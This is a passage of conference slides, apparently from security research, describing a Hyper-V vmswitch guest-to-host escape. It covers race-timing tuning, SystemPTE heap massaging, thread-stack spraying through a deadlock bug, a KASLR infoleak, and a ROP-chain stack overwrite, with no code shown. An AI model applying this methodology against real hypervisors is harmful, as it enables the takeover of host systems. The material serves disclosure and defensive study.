  • 71. Winning the race: configuring the delay • We can delay the event by N time units, but what’s N’s value? • We have a limited number of tries: need to be smart • Can we distinguish between race attempt outcomes? • Yes • If we’re too early, increase N • If we’re too late, decrease N • If we’re just right… celebrate ☺ • In practice we usually converge to the right N in <10 attempts • N can vary from machine to machine and session to session 71
  • 72. Finding a target: where’s our buffer? • GPADL mapping • GPADL PAs mapped into an MDL using VmbChannelMapGpadl • MDL then mapped to VA space using MmGetSystemAddressForMdlSafe • Where are MDLs mapped to? The SystemPTE region • What’s mapped adjacent to our MDL? • ...other MDLs 0: kd> !address @@c++(ReceiveBuffer) Usage: Base Address: ffffdd80`273d5000 End Address: ffffdd80`27606000 Region Size: 00000000`00231000 VA Type: SystemRange 72
  • 73. Finding a target: allocation primitives • Receive/send buffers: we can map an arbitrary number of arbitrarily sized MDLs • (“arbitrary”: still have size/number limits, but they’re pretty high) • Receive/send buffers: can be revoked • NVSP_MSG1_TYPE_REVOKE_RECV_BUF and NVSP_MSG1_TYPE_REVOKE_SEND_BUF • Since replacing buffers is a bug, we can only revoke the last one sent for each • We have pretty good allocation and freeing primitives for manipulating the region • But we need a way to allocate new stacks if we want to target them… • Can we spray host-side threads? 73
  • 74. Finding a target: stack allocation primitives • vmswitch relies on System Worker Threads to perform asynchronous tasks • NT-maintained thread pool • Additional threads are added to the pool when all others are busy • Basic idea: trigger an asynchronous task many times in rapid succession • If enough tasks are queued quickly enough, threads will be spawned • Several vmswitch messages rely on System Worker Threads • In this exploit we use NVSP_MSG2_TYPE_SEND_NDIS_CONFIG • Problem • This method usually lets us create about 5 threads • What if there are already a lot of threads in the system worker pool? • Would be nice to be able to terminate them… 74
  • 75. Finding a target: stack allocation primitives • There’s no by-design way to terminate worker threads from a guest • But there are bugs we can use! ☺ • NVSP_MSG1_TYPE_REVOKE_SEND/RECV_BUF • Revocation done on system worker threads • Deadlock bug: when multiple revocation messages handled, all but the last system worker thread would be deadlocked forever • We can use this to lock out an “arbitrary” number of system worker threads • We now have a limited thread stack spray! 75
  • 76. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #2 76
  • 77. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #2 77
  • 78. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #2 78
  • 79. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #2 79
  • 80. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Replaceable receive buffer Thread stack Outcome #2 80
  • 81. Finding a target: SystemPTE massaging • After massaging, we know a stack is at one of two offsets from the receive buffer • Either 3MB - 6 pages away or 4MB - 6 pages away • Since we can perform the race reliably, we can just try both possible offsets • Note: doing the race requires revoking and re-mapping the receive buffer • We can do this because the SystemPTE bitmap will free our 2MB block and reuse it for next 2MB block allocation • As a result, we’re almost guaranteed to fall back into the same slot if we’re fast enough • We can overwrite a stack, but what do we write? • Overwriting return addresses requires a host KASLR bypass • Easiest way to do this: find an infoleak vulnerability 81
  • 82. Putting it all together • We can leak 32 bytes of host stack memory • We can leak a vmswitch return address • With a return address we can build a ROP chain ☺ • Final exploit: • Use infoleak to locate vmswitch • Use information to build a ROP chain • We don’t know for sure which stack we’re corrupting, so we prepend a ROP NOP-sled • (that just means a bunch of pointers to a RET instructions in a row) • Perform host SystemPTE massaging • Use race condition to overwrite host kernel thread stack with ROP chain 82
  • 83. What about security? Host OS mitigations • Full KASLR • Kernel Control Flow Guard • Optional • Hypervisor-enforced code integrity (HVCI) • Optional • No sandbox Host OS kernel • ASLR • Control Flow Guard (CFG) • Arbitrary Code Guard (ACG) • Code Integrity Guard (CIG) • Win32k lockdown VM Worker Process 83